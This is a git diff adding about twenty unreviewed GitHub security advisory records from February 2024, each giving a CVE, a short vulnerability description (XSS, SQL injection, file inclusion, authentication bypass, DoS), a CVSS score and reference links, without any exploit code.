a/advisories/unreviewed/2024/02/GHSA-6gg6-4gm5-vqq7/GHSA-6gg6-4gm5-vqq7.json b/advisories/unreviewed/2024/02/GHSA-6gg6-4gm5-vqq7/GHSA-6gg6-4gm5-vqq7.json new file mode 100644 index 0000000000000..6d11e35f510d1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6gg6-4gm5-vqq7/GHSA-6gg6-4gm5-vqq7.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6gg6-4gm5-vqq7", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-1055" + ], + "details": "The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's buttons in all versions up to, and including, 2.7.14 due to insufficient input sanitization and output escaping on user supplied URL values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1055" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/powerpack-lite-for-elementor/trunk/modules/buttons/widgets/buttons.php#L1544" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6gmm-6q8h-c7mm/GHSA-6gmm-6q8h-c7mm.json b/advisories/unreviewed/2024/02/GHSA-6gmm-6q8h-c7mm/GHSA-6gmm-6q8h-c7mm.json new file mode 100644 index 0000000000000..a7137a83d6f5c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6gmm-6q8h-c7mm/GHSA-6gmm-6q8h-c7mm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6gmm-6q8h-c7mm", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-21863" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21863" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6h3f-p66m-6j79/GHSA-6h3f-p66m-6j79.json b/advisories/unreviewed/2024/02/GHSA-6h3f-p66m-6j79/GHSA-6h3f-p66m-6j79.json new file mode 100644 index 0000000000000..96a1d9e0ca8c0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6h3f-p66m-6j79/GHSA-6h3f-p66m-6j79.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h3f-p66m-6j79", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-32329" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. IBM X-Force ID: 254972.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32329" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254972" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json b/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json new file mode 100644 index 0000000000000..fa11f4ae0bb4b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h6q-fm45-w3hv", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24259" + ], + "details": "mupdf v1.23.9 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24259" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_2.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6hrp-c93c-rq8p/GHSA-6hrp-c93c-rq8p.json b/advisories/unreviewed/2024/02/GHSA-6hrp-c93c-rq8p/GHSA-6hrp-c93c-rq8p.json new file mode 100644 index 0000000000000..0847611d992af --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6hrp-c93c-rq8p/GHSA-6hrp-c93c-rq8p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hrp-c93c-rq8p", + "modified": "2024-02-08T21:30:34Z", + "published": "2024-02-01T09:30:18Z", + "aliases": [ + "CVE-2024-24548" + ], + "details": "Payment EX Ver1.1.5b and earlier allows a remote unauthenticated attacker to obtain the information of the user who purchases merchandise using Payment EX.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24548" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN41129639/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6j46-c3h7-p829/GHSA-6j46-c3h7-p829.json b/advisories/unreviewed/2024/02/GHSA-6j46-c3h7-p829/GHSA-6j46-c3h7-p829.json new file mode 100644 index 0000000000000..9a79baa6069eb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6j46-c3h7-p829/GHSA-6j46-c3h7-p829.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6j46-c3h7-p829", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-0955" + ], + "details": "\nA stored XSS vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus proxy settings, which could lead to the execution of remote arbitrary scripts. \n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0955" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2024-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6jg6-g5fm-jqjq/GHSA-6jg6-g5fm-jqjq.json b/advisories/unreviewed/2024/02/GHSA-6jg6-g5fm-jqjq/GHSA-6jg6-g5fm-jqjq.json new file mode 100644 index 0000000000000..5ed3b8bc52854 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6jg6-g5fm-jqjq/GHSA-6jg6-g5fm-jqjq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6jg6-g5fm-jqjq", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-22520" + ], + "details": "An issue discovered in Dronetag Drone Scanner 1.5.2 allows attackers to impersonate other drones via transmission of crafted data packets.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22520" + }, + { + "type": "WEB", + "url": "https://github.com/Drone-Lab/Dronetag-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6mgj-w244-f2gh/GHSA-6mgj-w244-f2gh.json b/advisories/unreviewed/2024/02/GHSA-6mgj-w244-f2gh/GHSA-6mgj-w244-f2gh.json new file mode 100644 index 0000000000000..6a87bfefc7e63 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6mgj-w244-f2gh/GHSA-6mgj-w244-f2gh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mgj-w244-f2gh", + "modified": "2024-02-02T09:30:21Z", + "published": "2024-02-02T09:30:21Z", + "aliases": [ + "CVE-2023-49118" + ], + "details": "\nin OpenHarmony v3.2.4 and prior versions allow a local attacker causes information leak through out-of-bounds Read.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49118" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6rgx-2w6c-4cv2/GHSA-6rgx-2w6c-4cv2.json b/advisories/unreviewed/2024/02/GHSA-6rgx-2w6c-4cv2/GHSA-6rgx-2w6c-4cv2.json new file mode 100644 index 0000000000000..5f9542914dbbc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6rgx-2w6c-4cv2/GHSA-6rgx-2w6c-4cv2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rgx-2w6c-4cv2", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-1201" + ], + "details": "Search path or unquoted item vulnerability in HDD Health affecting versions 4.2.0.112 and earlier. This vulnerability could allow a local attacker to store a malicious executable file within the unquoted search path, resulting in privilege escalation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1201" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/panterasoft-hdd-health-search-path-or-unquoted-item-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T12:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6rq5-p8rc-hp83/GHSA-6rq5-p8rc-hp83.json b/advisories/unreviewed/2024/02/GHSA-6rq5-p8rc-hp83/GHSA-6rq5-p8rc-hp83.json new file mode 100644 index 0000000000000..86cfd031bfc50 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6rq5-p8rc-hp83/GHSA-6rq5-p8rc-hp83.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rq5-p8rc-hp83", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2024-1184" + ], + "details": "A vulnerability was found in Nsasoft Network Sleuth 3.0.0.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-252674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1184" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/10-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252674" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252674" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6wvv-3xrf-xrf6/GHSA-6wvv-3xrf-xrf6.json b/advisories/unreviewed/2024/02/GHSA-6wvv-3xrf-xrf6/GHSA-6wvv-3xrf-xrf6.json new file mode 100644 index 0000000000000..cef0908334565 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6wvv-3xrf-xrf6/GHSA-6wvv-3xrf-xrf6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6wvv-3xrf-xrf6", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2024-20252" + ], + "details": "Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. \n\n Note: \"Cisco Expressway Series\" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.\n\n For more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20252" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6xj8-7c6f-w9rq/GHSA-6xj8-7c6f-w9rq.json b/advisories/unreviewed/2024/02/GHSA-6xj8-7c6f-w9rq/GHSA-6xj8-7c6f-w9rq.json new file mode 100644 index 0000000000000..cb089665b8494 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6xj8-7c6f-w9rq/GHSA-6xj8-7c6f-w9rq.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xj8-7c6f-w9rq", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-24000" + ], + "details": "jshERP v3.3 is vulnerable to Arbitrary File Upload. The jshERP-boot/systemConfig/upload interface does not check the uploaded file type, and the biz parameter can be spliced into the upload path, resulting in arbitrary file uploads with controllable paths.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24000" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24000.txt" + }, + { + "type": "WEB", + "url": "https://github.com/jishenghua/jshERP" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-723r-pvr9-6p2w/GHSA-723r-pvr9-6p2w.json b/advisories/unreviewed/2024/02/GHSA-723r-pvr9-6p2w/GHSA-723r-pvr9-6p2w.json new file mode 100644 index 0000000000000..c4743b74b053d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-723r-pvr9-6p2w/GHSA-723r-pvr9-6p2w.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-723r-pvr9-6p2w", + "modified": "2024-02-07T03:30:32Z", + "published": "2024-02-07T03:30:32Z", + "aliases": [ + "CVE-2024-1267" + ], + "details": "A vulnerability, which was classified as problematic, has been found in CodeAstro Restaurant POS System 1.0. Affected by this issue is some unknown functionality of the file create_account.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-253010 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1267" + }, + { + "type": "WEB", + "url": "https://drive.google.com/drive/folders/18N_20KuGPjrBbvOMSfbvBIc1sMKyycH3?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253010" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253010" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-72xj-cfw6-3c4q/GHSA-72xj-cfw6-3c4q.json b/advisories/unreviewed/2024/02/GHSA-72xj-cfw6-3c4q/GHSA-72xj-cfw6-3c4q.json new file mode 100644 index 0000000000000..9e044c650db92 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-72xj-cfw6-3c4q/GHSA-72xj-cfw6-3c4q.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-72xj-cfw6-3c4q", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6989" + ], + "details": "The Shield Security – Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6989" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/063826cc-7ff3-4869-9831-f6a4a4bbe74c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-73g2-fg3c-4vx6/GHSA-73g2-fg3c-4vx6.json b/advisories/unreviewed/2024/02/GHSA-73g2-fg3c-4vx6/GHSA-73g2-fg3c-4vx6.json new file mode 100644 index 0000000000000..4374f3d4184be --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-73g2-fg3c-4vx6/GHSA-73g2-fg3c-4vx6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73g2-fg3c-4vx6", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20016" + ], + "details": "In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation Patch ID: ALPS07835901; Issue ID: ALPS07835901.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20016" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-73v5-rhgg-73mq/GHSA-73v5-rhgg-73mq.json b/advisories/unreviewed/2024/02/GHSA-73v5-rhgg-73mq/GHSA-73v5-rhgg-73mq.json new file mode 100644 index 0000000000000..1a9c55d72f4ac --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-73v5-rhgg-73mq/GHSA-73v5-rhgg-73mq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73v5-rhgg-73mq", + "modified": "2024-02-06T12:30:30Z", + "published": "2024-02-06T12:30:30Z", + "aliases": [ + "CVE-2024-23917" + ], + "details": "In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23917" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-75gj-wpvg-hgcq/GHSA-75gj-wpvg-hgcq.json b/advisories/unreviewed/2024/02/GHSA-75gj-wpvg-hgcq/GHSA-75gj-wpvg-hgcq.json new file mode 100644 index 0000000000000..693f01ce18047 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-75gj-wpvg-hgcq/GHSA-75gj-wpvg-hgcq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75gj-wpvg-hgcq", + "modified": "2024-02-02T00:31:28Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2023-50939" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 275129.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50939" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275129" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-75pw-9w79-3j7q/GHSA-75pw-9w79-3j7q.json b/advisories/unreviewed/2024/02/GHSA-75pw-9w79-3j7q/GHSA-75pw-9w79-3j7q.json new file mode 100644 index 0000000000000..ed9543898dded --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-75pw-9w79-3j7q/GHSA-75pw-9w79-3j7q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75pw-9w79-3j7q", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24839" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.6.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24839" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-767m-gj6q-4gx8/GHSA-767m-gj6q-4gx8.json b/advisories/unreviewed/2024/02/GHSA-767m-gj6q-4gx8/GHSA-767m-gj6q-4gx8.json new file mode 100644 index 0000000000000..aa4147240b9d8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-767m-gj6q-4gx8/GHSA-767m-gj6q-4gx8.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-767m-gj6q-4gx8", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-48792" + ], + "details": "Zoho ManageEngine ADAudit Plus through 7250 is vulnerable to SQL Injection in the report export option.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48792" + }, + { + "type": "WEB", + "url": "https://manageengine.com" + }, + { + "type": "WEB", + "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-76cv-2f7v-55xx/GHSA-76cv-2f7v-55xx.json b/advisories/unreviewed/2024/02/GHSA-76cv-2f7v-55xx/GHSA-76cv-2f7v-55xx.json new file mode 100644 index 0000000000000..b0a834b42bbf1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-76cv-2f7v-55xx/GHSA-76cv-2f7v-55xx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76cv-2f7v-55xx", + "modified": "2024-02-04T21:30:44Z", + "published": "2024-02-04T21:30:44Z", + "aliases": [ + "CVE-2021-46903" + ], + "details": "An issue was discovered in LTOS-Web-Interface in Meinberg LANTIME-Firmware before 6.24.029 MBGID-9343 and 7 before 7.04.008 MBGID-6303. An admin can delete required user accounts (in violation of expected access control).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46903" + }, + { + "type": "WEB", + "url": "https://www.meinberg.de/german/news/meinberg-security-advisory-mbgsa-2021-03-meinberg-lantime-firmware-v7-04-008-und-v6-24-029.htm" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T21:15:07Z" + } +} \ No newline at end of file diff --git 